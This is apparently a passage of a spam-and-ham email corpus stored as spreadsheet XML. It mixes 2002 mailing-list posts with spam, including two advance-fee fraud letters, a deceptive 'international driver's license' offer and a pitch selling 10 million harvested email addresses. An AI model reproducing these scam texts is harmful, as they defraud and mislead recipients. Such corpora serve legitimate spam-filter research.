                   &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;FONT 
                   face="Times New Roman" size=3&gt;&lt;SPAN 
                   style="FONT-SIZE: 12pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
             &lt;P class=MsoNormal&gt;&lt;FONT face="Times New Roman" size=3&gt;&lt;SPAN 
             style="FONT-SIZE: 12pt"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
       &lt;P class=MsoNormal&gt;&lt;FONT face="Times New Roman" size=3&gt;&lt;SPAN 
       style="FONT-SIZE: 12pt"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;P class=MsoNormal style="MARGIN-LEFT: 1in"&gt;&lt;FONT face="Times New Roman" 
 size=2&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;&lt;BR&gt;To be Removed, reply with REMOVE in 
 the
 subject line.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 9 Oct 2002 11:03:11 +0200, Matthias Saou &lt;matthias@rpmforge.net&gt; wrote:
 &gt; I don't think gpg signing my repositories will help anything, as it will
 &gt; just ensure that my passphrase was typed to confirm the md5 signatures of
 &gt; all pgklists and srclists. Basically, you'll then just be sure that it's me
 &gt; who generated the files, and this will of course prevent automating the
 &gt; process of updating the apt repository when Red Hat updates show up.
     Isn't there a packager-key that's concealed inside the rpm?  Things have changed a bit since I used to work with'em, but I thought there was some internal number that must be compared to be correct (or, presumably, return an error.)
 &gt; In Red Hat Linux 8.0 though, the warnings about "No Key" appear until you
 &gt; import the right gpg public keys directly with rpm, for example :
 &gt; rpm --import /usr/share/doc/apt-0.5.4cnc7/RPM-GPG-KEY
 &gt; (this will import my key, which is used to sign all freshrpms.net packages)
     Hey, cool; wether it protects me or not, I feel better about it.
 &gt; Hopefully it is possible to the tell rpm to install *only* packages who
 &gt; verify against an imported gpg key? This for me would be the optimal way to
 &gt; ensure integrity with the way things curently work.
     Yeah, surely there's a flag for that; there is, for everything else, aye?  :)
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 angegangen, Schlange-Hften, sein es ganz rber jetzt. Bgel innen fest,
 weil es eine lange, ssse Fahrt ist. 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] please kindly get back to me
</t>
  </si>
  <si>
    <t xml:space="preserve"> REQUEST FOR URGENT BUSINESS ASSISTANCE
 --------------------------------------
 Your contact was availed to me by the chamber of
 commerce. It was given  to me because of my diplomatic 
 status as I did not disclose the actual reasons for 
 which I sought your contact. But I was
 assured That you are reputable and trustworthy if you
 will be of assistance. 
 I am Laurent Mpeti Kabila (Jnr) the second son of
 Late President LAURENT DESIRE KABILA the immediate
 Past president of the DEMOCRATIC REPUBLIC OF CONGO in
 Africa who was murdered by his opposition through his 
 personal bodyguards in his bedroom on Tuesday 16th January, 2001.
 I have the privilege of being mandated by my father colleagues 
 to seek your immediate and urgent co-operation to receive into
 your bank account the sum of US $25m.(twenty-five million Dollars)
 and some thousands carats of Diamond. 
 This money and treasures was lodged in a vault with a
 security firm in Europe and South-Africa.
 SOURCES OF DIAMONDS AND FUND
 In August 2000, my father as a defence minister and president has a 
 meeting with his cabinet and armychief about the defence budget for
 2000 to 2001 which was US $700m. so he directed one of his best
 friend. Frederic Kibasa Maliba who was a minister of
 mines and a political party leader known as the Union Sacree de, 
 I_x0011_ opposition radicale et ses allies (USORAL) to buy arms
 with US $200m on 5th January 2001; for him to finalized the arm_x0012_s
 deal,
 my father was murdered. f.K. Maliba (FKM) and I have decided to keep
 the money with a foreigner after which he will use it to contest for
 the political election. Inspite of all this we have resolved to
 present your or your company for the firm to pay it into your
 nominated 
 account the above sum and diamonds. This transaction should be
 finalized within
 seven (7) working days and for your co-operation and partnership, we
 have unanimously agreed that you will be entitled to 5.5% of the money
 when successfully receive it in your account. The nature of your
 business is not relevant to the successful execution of this
 transaction what we
 require is your total co-operation and commitment to ensure 100%
 risk-free transaction at both ends and to protect the persons
 involved in this
 transaction, strict confidence and utmost secrecy is required
 even after the successful conclusion of this transaction. If this
 proposal is acceptable to you, kindly provide me with your personal
 telephone
 and fax through my E-mail box for immediate commencement of the
 transaction. 
 All correspondence is for the attention of my counsel:joseph edward.
 I count on your honour to keep my secret, SECRET.
 Looking forward for your urgent reply
 Thanks.
 Best Regards
 MPETI L. KABILA (Jnr)
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Legal identification
</t>
  </si>
  <si>
    <t xml:space="preserve">INTERNATIONAL DRIVER'S LICENSE
 Need a new driver's license?
 Too many points or other trouble?
 Want a license that can never be suspended
 or revoked?
 Want an ID for nightclubs or hotel check-in?
 Avoid tickets, fines, and mandatory driver's
 education.
 Protect your privacy, and hide your identity.
 The United Nations gave you the privilege to
 drive freely throughout the world! (Convention
 on International Road Traffic of September 19,
 1949 &amp; World Court Decision, The Hague,
 Netherlands, January 21, 1958)
 Take advantage of your rights. Order a valid
 International Driver's License that can never
 be suspended or revoked.
 Confidentiality assured.
 CALL NOW!!!
 1-770-908-3949 
 We await your call seven days a week, 24 hours a day,
 including Sundays and holidays.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Now for Benjamin, yea id love to have something like the amazingly cool
 &gt; Fisher Price My First (cd, casset, vasectomy, dirtybomb) products. Perhaps
 &gt; the My First Cd might work...time to let ebay do the walking.
 Sony makes such a line of products.
 My father was legendary for his abilty to break things.  His 'thumbs of death'
 would rival anything a toddler could do to devices.  After countless numbers of
 Walkman devices having their lids broken or buttons pressed into oblivion I
 found the Sony devices.  I got him a "My First Sony" (be afraid of the
 marketing) CD player.   It was /fire engine red/ but was completely
 indestructible.  I hacked a headphone jack into it and gave it to him.  He
 complained of it's looks but used it nonetheless.  I also gave him a pack of
 headphones as there's no such things indestuctible headphones that aren't
 obscenely bulky.
 Now that we're riding up the curve of an ever increasing geezer population, how
 soon before device makers get wise?  Not to be morbid, but would the marketing
 be "My Last Sony"?  &lt;ducks and runs&gt;
 -Bill Kearney
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free LTCI Policy Comparison Software
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_18A46D_01C208DC.75F3BB50
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Group Worksite LTCI with Phyllis Shelton "The First Lady of LTCI" and
 InsuranceIQ
  Free with purchase: LTC Policy Comparison Software! Free with purchase:
 LTC Policy Comparison Software!	 	
  Long Term Care Insurance Worksite Marketing System 	
 Take advantage of the most current information available concerning the
 group LTCI market. Developed after months of exhaustive research and
 agent interviews, the Worksite Marketing System is THE resource for
 successful group enrollment.
 Included with your order:
 ? Agent Manual - all the "how-to" info including an implementation
 schedule 
 ? Benefit Manager Flip Chart 
 ? Presentation/Sales Script which promotes Long Term Care Insurance as
 "Productivity
   Insurance"
 ? Benefit Manager Sales Brochures 
 ? Benefit Manager Direct Mail Letters 
 ? Employer Announcement Letter 
 ? Seven (7) Newsletter/E-Mail Articles to promote employee education
 prior to meetings 
 ? 50 each of five (5) Payroll Stuffers 
 ? 50 each of three (3) Employee Seminar Posters 
 ? Employee Education Presentation on CD-ROM 
 ? 150 Employee Education Brochures which promote Long Term Care
 Insurance as 
    "Lifestyle Insurance" 
 ? "The Secret of a Successful Group Enrollment" instructional audiotape 
 ? A handsome gold embossed binder with storage pockets
 Click here for more information and pricing
 &lt;http://www.insiq.com/store/product.asp?pid=14&gt; 
  BONUS! Free with your order: The LTC Policy Comparison - a $120 value!	
  Click here to view a demo PDF!
 &lt;http://www.insiq.com/store/products/48comparison_demo2.pdf&gt;  	
 This comprehensive LTCI policy review compares over 40 major companies
 in 17 benefit and ratings/asset categories and includes a premium
 comparison for a 60 year old couple.
 Over 210 policies are covered in this semi-annual publication. This is
 the oldest LTC policy comparison in the nation and is a valuable tool
 for any agent selling LTC insurance today.
 (Older generation policies are kept after new policies are introduced
 because agents encounter the older policies in the field.)
 The CD-ROM version allows you to compare up to three companies at a time
 in any of the 17 categories. You'll also receive a spreadsheet version
 to take with you all the time.
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.Insurancemail.net
 &lt;http://www.Insurancemail.net&gt; 
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt; 
 ------=_NextPart_000_18A46D_01C208DC.75F3BB50
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free LTCI Policy Comparison Software&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000" =
 background=3D"http://iiq.us/images/ltcc/20011219-6.gif"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" border=3D"1" =
 align=3D"center" bordercolor=3D"#000000" bgcolor=3D"#ffffff"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%"&gt;
         &lt;tr&gt;=20
           &lt;td valign=3D"middle"&gt;
             &lt;img src=3D"http://iiq.us/images/ltcc/20020521-301.gif" =
 width=3D"418" height=3D"139" alt=3D"Group Worksite LTCI with Phyllis =
 Shelton &amp;quot;The First Lady of LTCI&amp;quot; and InsuranceIQ"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/ltcc/20020521-401.gif" =
 width=3D"74" height=3D"61" alt=3D"Free with purchase: LTC Policy =
 Comparison Software!"&gt;&lt;img =
 src=3D"http://iiq.us/images/ltcc/20020521-402.gif" width=3D"344" =
 height=3D"61" alt=3D"Free with purchase: LTC Policy Comparison =
 Software!"&gt;
           &lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/ltcc/20020403-302.jpg" =
 width=3D"132" height=3D"200"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td bgcolor=3D"#000066"&gt;
             &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#FFFFFF"&gt;&amp;nbsp;Long Term Care Insurance Worksite =
 Marketing System&lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td valign=3D"top"&gt;=20
             &lt;p align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ltcc/WorksiteMaketingSystem.jpg" =
 width=3D"455" height=3D"214"&gt;&lt;/p&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;=20
             &lt;p&gt;Take advantage of the most current information available =
 concerning=20
               the group LTCI market. Developed after months of =
 exhaustive research=20
               and agent interviews, the Worksite Marketing System is THE =
 resource=20
               for successful group enrollment.&lt;/p&gt;
             &lt;p&gt;&lt;i&gt;Included with your order:&lt;/i&gt;&lt;br&gt;
               &amp;#149;&amp;nbsp;Agent Manual - all the &amp;quot;how-to&amp;quot; info =
 including an implementation schedule &lt;br&gt;
               &amp;#149;&amp;nbsp;Benefit Manager Flip Chart &lt;br&gt;
               &amp;#149;&amp;nbsp;Presentation/Sales Script which promotes Long =
 Term Care Insurance as &amp;quot;Productivity&lt;br&gt;
               &amp;nbsp;&amp;nbsp;Insurance&amp;quot;&lt;br&gt;
               &amp;#149;&amp;nbsp;Benefit Manager Sales Brochures &lt;br&gt;
               &amp;#149;&amp;nbsp;Benefit Manager Direct Mail Letters &lt;br&gt;
               &amp;#149;&amp;nbsp;Employer Announcement Letter &lt;br&gt;
               &amp;#149;&amp;nbsp;Seven (7) Newsletter/E-Mail Articles to =
 promote employee education prior to meetings &lt;br&gt;
               &amp;#149;&amp;nbsp;50 each of five (5) Payroll Stuffers &lt;br&gt;
               &amp;#149;&amp;nbsp;50 each of three (3) Employee Seminar Posters =
 &lt;br&gt;
               &amp;#149;&amp;nbsp;Employee Education Presentation on CD-ROM &lt;br&gt;
               &amp;#149;&amp;nbsp;150 Employee Education Brochures which promote =
 Long Term Care Insurance as &lt;br&gt;
               &amp;nbsp;&amp;nbsp; &amp;quot;Lifestyle Insurance&amp;quot; &lt;br&gt;
               &amp;#149;&amp;nbsp;&amp;quot;The Secret of a Successful Group =
 Enrollment&amp;quot; instructional audiotape &lt;br&gt;
               &amp;#149;&amp;nbsp;A handsome gold embossed binder with storage =
 pockets&lt;/p&gt;
             &lt;p align=3D"center"&gt;&lt;a =
 href=3D"http://www.insiq.com/store/product.asp?pid=3D14"&gt;&lt;img =
 src=3D"http://iiq.us/images/ltcc/20020521-2.gif" width=3D"413" =
 height=3D"45" border=3D"0" alt=3D"Click here for more information and =
 pricing"&gt;&lt;/a&gt;&lt;/p&gt;
             &lt;/font&gt;
           &lt;/TD&gt;
         &lt;/TR&gt;
         &lt;tr&gt;=20
           &lt;td bgcolor=3D"#000066" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ltcc/20020521-1.gif" width=3D"527" =
 height=3D"68" alt=3D"BONUS! Free with your order: The LTC Policy =
 Comparison - a $120 value!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td valign=3D"top"&gt;=20
             &lt;table width=3D"234" cellpadding=3D"2" cellspacing=3D"2" =
 align=3D"left"&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"center"&gt;
                   &lt;img =
 src=3D"http://iiq.us/images/ltcc/LTC-Policy-Comparison.gif" =
 width=3D"309" height=3D"208"&gt;&lt;br&gt;
                   &lt;img src=3D"spacer.gif" width=3D"1" height=3D"40"&gt;&lt;a =
 href=3D"http://www.insiq.com/store/products/48comparison_demo2.pdf"&gt;&lt;img =
 src=3D"http://iiq.us/images/ltcc/20020403-2.gif" width=3D"197" =
 height=3D"35" border=3D"0" alt=3D"Click here to view a demo PDF!"&gt;&lt;/a&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;
             &lt;p&gt; This comprehensive LTCI policy review compares over 40 =
 major companies in 17 benefit=20
               and ratings/asset categories and includes a premium =
 comparison for=20
               a 60 year old couple.&lt;/p&gt;
             &lt;p&gt;Over 210 policies are covered in this semi-annual =
 publication. This is the oldest=20
               LTC policy comparison in the nation and is a valuable tool =
 for any=20
               agent selling LTC insurance today.&lt;/p&gt;
             &lt;p&gt;(Older generation policies are kept after new policies =
 are introduced because agents=20
               encounter the older policies in the field.)&lt;/p&gt;
             &lt;p&gt;The CD-ROM version allows you to compare up to three =
 companies at a time in any of=20
               the 17 categories. You'll also receive a spreadsheet =
 version to=20
               take with you all the time.&lt;/p&gt;
             &lt;/font&gt;=20
           &lt;/TD&gt;
         &lt;/TR&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#ccccff" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;
         We don't want anybody to receive our mailings who does not wish =
 to receive=20
         them. This is professional communication sent to insurance=20
         professionals. To be removed from this mailing list, &lt;b&gt;DO NOT =
 REPLY&lt;/b&gt;=20
         to this message. Instead, go here: &lt;a =
 href=3D"http://www.Insurancemail.net"&gt;=20
         http://www.Insurancemail.net&lt;/a&gt;&lt;br&gt;
         &lt;a href=3D'http://www.insiq.com/legal.htm'&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_18A46D_01C208DC.75F3BB50--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-10
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 This Week on perl5-porters (2-8 September 2002)
     posted by rafael on Monday September 09, @07:33 (summaries)
     http://use.perl.org/article.pl?sid=02/09/09/1147243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</si>
  <si>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Fading blue
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597651,215/
 Date: 2002-10-06T02:28:04+01:00
 Will the last person to leave the Tory party please turn out the light? *Rachel 
 Cooke* scours the land looking for Conservative voters.Quizzes[1]| Crossword
 [2]| Interactive guides[3]| Steve Bell[4]| Weblog[5]*Other news and comment
 **Met launches new 'sus' patrols*[6]
 [1] http://www.newsisfree.com/quiz/0,7476,349695,00.html
 [2] http://www.newsisfree.com/crossword/0,4406,180778,00.html
 [3] http://www.newsisfree.com/interactive/0,2759,192055,00.html
 [4] http://www.newsisfree.com/cartoons/0,7371,337484,00.html
 [5] http://www.newsisfree.com/weblog/0,6798,517233,00.html
 [6] http://www.newsisfree.com/Observer/crimedebate/story/0,12079,805631,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From tmda.net/history.html:
 The first release of TMDA in April 2001 was essentially a rewrite of TMS in
 Python, &lt;snip&gt;
 April 2001 is earlier than July 26, 2001... prior art..
 from http://tmda.net/releases/old/
  Parent Directory        19-Aug-2002 16:14      -
  README.MD5SUM           19-Aug-2002 16:14     4k
  tmda-0.01.tgz           22-Apr-2001 15:59    11k
  tmda-0.02.tgz           26-Apr-2001 12:06    12k
  tmda-0.02.txt           26-Apr-2001 12:50     1k
  tmda-0.10.tgz           27-Apr-2001 21:14    39k
  tmda-0.10.txt           30-Apr-2001 11:36     3k
  tmda-0.11.tgz           02-May-2001 17:17    38k
  tmda-0.11.txt           02-May-2001 17:06     3k
  tmda-0.12.tgz           10-May-2001 19:50    39k
  tmda-0.12.txt           10-May-2001 19:48     1k
  tmda-0.13.tgz           17-May-2001 15:53    39k
  tmda-0.13.txt           17-May-2001 15:57     2k
  tmda-0.14.tgz           24-May-2001 16:43    46k
  tmda-0.14.txt           24-May-2001 16:40     4k
  tmda-0.15.tgz           28-May-2001 15:20    47k
  tmda-0.15.txt           28-May-2001 15:20     1k
  tmda-0.20.tgz           06-Jun-2001 17:52    49k
  tmda-0.20.txt           06-Jun-2001 18:46     6k
  tmda-0.21.tgz           18-Jun-2001 18:32    51k
  tmda-0.21.txt           18-Jun-2001 18:31     2k
 TMDA was already at 0.21 8 days before filing for a patent..
 ----- Original Message -----
 From: "Jason R. Mastaler" &lt;jason-exp-1031164464.7f11b3@mastaler.com&gt;
 To: "Justin Mason" &lt;yyyy@example.com&gt;
 Cc: &lt;spamassassin-talk@example.sourceforge.net&gt;; &lt;tmda-users@tmda.net&gt;
 Sent: Tuesday, August 27, 2002 11:34 AM
 Subject: [SAtalk] Re: patent on TMDA-like system
 jm@jmason.org (Justin Mason) writes:
 &gt; Sounds a lot like TMDA to me. :( Filing date is July 26, 2001,
 &gt; granted May 16, 2002.
 &gt;
 &gt; TMDAers, have you seen this before?
 No, but thanks for pointing it out.
 &gt; I'd presume TMDA is prior art, but still, it could be troublesome...
 Yup.  TMDA's core functionality was fully established before even the
 filing date.
 Anyone with experience in this area have a recommendation on whether
 this should be pursued or not?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</si>
  <si>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Free Adult DVDs. No purchase necessary... To: yyyy@netnoteinc.com ID: bju
</t>
  </si>
  <si>
    <t xml:space="preserve">To: yyyy@netnoteinc.com
 ############################################
 #                                          #
 #       Adult Online Super Store           #
 #              Shhhhhh...                  #
 #     You just found the Internet's        #
 #          BEST KEPT SECRET!!!             #
 #    3 Vivid DVDs Absolutely FREE!!!       #
 #                                          #
 ############################################
 If you haven't seen it yet... we are offering a
 new weekly selection absolutely FREE Adult DVDs
 AND VIDEOS NO PURCHASE NECESSARY!!!!!
  GO TO: http://209.203.162.20/8230/
 Everything must go!!! Additional Titles as
 low as $6.97
 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 ############################################
 #                                          #
 #  Don't forget to forward this email to   #
 #  all your friends for the same deal...   #
 #  There is a new free DVD and VHS video   #
 #  available every week for your viewing   #
 #  pleasure.                               #
 #                                          #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http://209.203.162.20/optout.html 
 . Please allow 24 hours for removal.
 This e-mail is sent in compliance with the Information Exchange Promotion 
 and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 
 'removal' instruction.
 kpjxxyrsjsnapbhilmbgsnenma
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 10 million fresh email addresses sent to you on CD for FREE!!! TRY BEFORE YOU BUY!!
</t>
  </si>
  <si>
    <t xml:space="preserve">GET READY FOR A DEAL YOU'VE NEVER SEEN BEFORE!
 10 million hot fresh email addresses and much more!
 TRY BEFORE YOU BUY!!!!!
 WE WILL SEND YOU THE 
 POWERMAN 10 MILLION
 Internet Marketing Shop 
 CD FREE 
 This is what you get:
  10 million freah email addresses
 Fully functional websites - ready to take orders 
 Proven high impact resalable products - ebooks
 Cutting edge internet marketing tools
 Instructions &amp; valuable links 
 Test The CD, when you're 100% satisfied that the CD is everything
 and more than it claims to be - then send $49.95 by check. money
 order or pay by credit card on our website.
 NO STRINGS ATTACHED - WE SEND YOU THE CD - IF YOU LIKE IT - 
 YOU PAY - IF YOU DON'T LIKE IT - SEND IT BACK
 If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD  
 email: POWERMAN10MILLION@hotmail.com
 Subject Line: SEND CD
 Your Mailing Address:
 10 MILLION NEW Addresses - Just Released! &lt;&lt;&lt; THE VERY BEST email addresses available 
 anywhere!! Our research has found that many people have tried one or more of the following...
 Free Classifieds? (Don't work)
 Web Site? (Takes thousands of visitors)
 Banners? (Expensive and iffy)
 E-Zine? (They better have a huge list)
 Search Engines? (Easily buried with thousands of others)
 S O    W H A T   D O E S   W O R K ? 
 Although often misunderstood, there is one method  that has proven to succeed time-after-time.
 E - M A I L M A R K E T I N G ! !
 Here's what the experts have to say about E-Mail Marketing:
 "A gold mine for those who can take advantage of
 mass e-mail programs" - The New York Times
 "E-mail is an incredible lead generation tool"
 -Crains Magazine
 "Blows away traditional Mailing" 
 - Advertising Age
 Here is an example of your potential earnings if you have a product that
 brings you a profit of around $30. Remember, on the Internet, you can
 make money 7 days a week, 24 hours a day... even while you sleep, 
 orders come from all over the world!
 Orders Per Day         Weekly Earnings             Monthly Earnings             Yearly Earnings
        1                              $210.00                           $840.00                             $10,080.00
        2                              $420.00                           $1,680.00                          $20,160.00
        3                              $630.00                           $2,520.00                          $30,240.00
        5                              $1,050.00                        $4,200.00                          $50,400.00
      10                              $2,100.00                        $8,400.00                          $100,000.00
      15                              $3,150.00                        $12,600.00                        $151,200.00
 THE QUESTION IS... how do you generate those orders?
 THE POWERMAN 10 MILLION - TRY BEFORE YOU BUY THE POWERMAN 10 MILLION, is the 
 ABSOLUTE BEST product of its kind anywhere in the world today.  There are NO OTHER products 
 ANYWHERE that can compete with the quality of this CD. 
 If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD  
 email:  POWERMAN10MILLION@hotmail.com
 Subject Line: SEND CD
 Your Mailing Address:
 O N E   O F   A   K I N D
 This CD is a first. No one... and we mean NO ONE is shipping valuable CDs to customers before 
 they pay. What is different about this offering? The main difference is all you have to do is email us 
 the address to ship the CD to! You don't have to worry about getting ripped off. There is no risk to you.
 Test The CD, when you're 100% satisfied that the CD is everything and more than it claims to be - 
 then send $49.95 by check. money order or credit card.
 Our claim to fame, is that our addresses are deliverable!  The number #1 problem with email lists are 
 deliverability. You may have seen dozens of ads for lists or CD's or you may have purchased a list in 
 the past. Chances are, the list was produced 6 months, 1 year or even two years ago! Not ours, a new 
 volume CD comes out every 6-7 weeks. 
 Here's how we prepare our e-mail lists:
 1. We clean and eliminate all duplicates. 
 2. Next, we use a filter list of 400+ words/phrases to clean even more. No address with inappropriate or 
 profane wording survive! 
 3. Then, a special filter file is used to eliminate the "Web Poisoned" e-mail addresses from the list. Our
 EXCLUSIVE system reduced these "poison" addresses to near zero. You may have seen CD's with 30, 40, 
 50 million addresses, not only do they contain many undeliverable addresses, but most are notorious for 
 millions of these "poisoned" email addresses.
 4. Next we used our private database of thousands of known "extremists" and kicked off every one we could 
 find. NOTE:We maintain the world's largest list of individuals and groups that are opposed to any kind of 
 commercial e-marketing... they are gone, nuked!
 5. All domains have been verified as valid. 
 WHAT DID WE END UP WITH?       THE POWERMAN 10 MILLION INTERNET MARKETING SHOP CD
 If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD  
 email:  POWERMAN10MILLION@hotmail.com
 Subject Line: SEND CD
 Your Mailing Address:
 Getting this CD is equivalent to buying EVERY CD sold by almost everyone else, combined... EXCEPT - 
 it has been cleaned and the quality is unsurpassed by any list in existence!  With our super clean lists you'll 
 send less...and get better results... plus you can start mailing as soon as you receive your CD! 
 * Y O U   G E T  W H A T   Y O U   P A Y   F O R *
 Our POWERMAN 10 MILLION INTERNET MARKETING CD will result in:
 * Higher Response Rates
 * Higher Sales Conversion Ratios
 * More Receptive prospects; Less Flames &amp; Non-Buyers.
 * Less Contact With Anti-Commerce Radicals &amp; Extremists.
 Remember that potential income chart at the beginning of this message? Can you imagine the kind of money you could 
 make if you mailed one million pieces and sold only one tenth (.01%) of one percent? You do the math, you'll be amazed!
 This product will prove to be the best of it's kind compared to ANY CD in terms of hours and money spent bringing it to
 market. No competitor will ever duplicate the effort of what it takes for us to produce this superb product. We never have 
 compromised on quality, and surely won't release any product before it passes our "high standards" test.This is not a 
 rental list that is restricted to a one-time mailing. You are purchasing an e-mail address list for your own personal mailings 
 and may use it over-and-over.
 If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD  
 email:  POWERMAN10MILLION@hotmail.com
 Subject Line: SEND CD
 Your Mailing Address:
 _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
 ** F R E E    B O N U S E S **
 "BUSINESS ON A DISK" bonus offer:
 Every survey has always indicated that the easiest and most profitable product to sell on the Internet is
 INFORMATION! If you have an "information" type product, then there is no easier way to become financially
 independent. 
 Our "BUSINESS ON A DISK" gives you awesome resalable products reports/manuals/books that that are yours 
 to use. You may instantly start your "Information Product" business! Just think, you can reproduce a complete book 
 on a floppy disc in just a few seconds, for around 35 cents. These are the same books that have 
 sold for $99. "Special Reports" cost you pennies to produce and can be  sold for as high as $15... or the whole group 
 for as high as $140.00.
 "THE MASS E-MAIL SURVIVAL GUIDE" A manual/guide that addresses the Mass E-Mail business. Especially useful 
 for beginners. "THE Mass E-MAIL SURVIVAL GUIDE" will answer most of your questions and concerns about Mass E-Mail. 
 An exclusive for our customers... INCLUDED FREE.
 If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD  
 email:  POWERMAN10MILLION@hotmail.com
 Subject Line: SEND CD
 Your Mailing Address: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</si>
  <si>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This message is in MIME format. Since your mail reader does not understand
 this format, some or all of this message may not be legible.
 --=_NextPart_Caramail_0190361032516937_ID
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 SENIOR ADVOCATE OF NIGERIA 
 BARR. WILLIAMS FALANA (SAN)
 Dear Sir, 
 I am Barrister Williams Falana a member of Nigeria Bar 
 Association (NBA).Your contact reached me through the World 
 Business Encyclopaedia.Hence,I made up my mind to introduce 
 this business to you in confidence for the mutual benefit 
 of both of us. 
 The sum of USD48M (Forty eight Million United States) was 
 lodged into a security company here in the Country by the 
 late Head of State (GEN.SANI ABACHA) for safe-keeping. This 
 money was lodged in security vaults / boxes and labelled as
 personal belongings and as such the security company does 
 not know the true content of the boxes.This money was 
 originally meant to be used for his political campaign. 
 Because I was his family Attorney as such he confided in me 
 with the relevant document papers relating to this deposit 
 before he died of cardiac arrest.
 As a matter of fact we have concluded all arrangement with 
 an offshore Security Company to move this money as a 
 consignment through diplomatic means to their offshore 
 affiliated office where you will be required to put claim 
 to the consignment as the bonafide beneficiary of the 
 consignment. You should know that this business is safety 
 and 100% risk-free as it does not involve drug money or 
 Terrorist fund.
 If you are interested to carry out this transaction with 
 me, 20% will be for you for your assistance, 5% for general 
 expenses, and 75% for us.
 You are required to send by e-mail immediately your Full 
 name and Address, which I will use to draft an agreement 
 that will guide and protect both of us in this transaction 
 also which will be used to effect the change of ownership 
